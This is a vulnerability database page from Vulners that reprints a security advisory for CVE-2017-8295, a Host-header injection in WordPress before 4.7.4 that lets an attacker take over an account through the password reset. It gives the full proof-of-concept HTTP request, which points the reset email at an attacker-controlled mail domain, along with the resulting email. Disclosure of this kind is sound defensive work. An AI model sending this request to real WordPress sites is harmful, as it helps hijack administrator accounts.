Vulners
Lucene search
WordPress Core < 4.7.4 - Unauthorized Password Reset
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | WordPress < 4.7.4 - Unauthorized Password Reset Vulnerability | 4 May 201700:00 | – | zdt |
 | Exploit for Weak Password Recovery Mechanism for Forgotten Password in Wordpress | 6 May 201709:51 | – | githubexploit |
 | CVE-2017-8295 | 4 May 201700:00 | – | attackerkb |
 | CVE-2017-8295 | 3 May 201721:55 | – | circl |
 | WordPress Unauthorized Password Reset Vulnerability | 4 May 201700:00 | – | cnvd |
 | WordPress Unauthorized Password Reset (CVE-2017-8295) | 7 May 201700:00 | – | checkpoint_advisories |
 | CVE-2017-8295 | 4 May 201714:00 | – | cve |
 | CVE-2017-8295 | 4 May 201714:00 | – | cvelist |
 | [SECURITY] [DLA 975-1] wordpress security update | 2 Jun 201712:47 | – | debian |
| [SECURITY] [DSA 3870-1] wordpress security update | 1 Jun 201705:31 | – | debian |
10
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================
Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
Wordpress will trigger the password reset function for the admin user account.
Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
------[ resulting e-mail ]-----
Subject: [CompanyX WP] Password Reset
Return-Path: <[email protected]>
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
-------------------------------
As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:
#!/bin/bash
cat > /tmp/outgoing-emailData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 May 2017 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 35.9
EPSS0.77097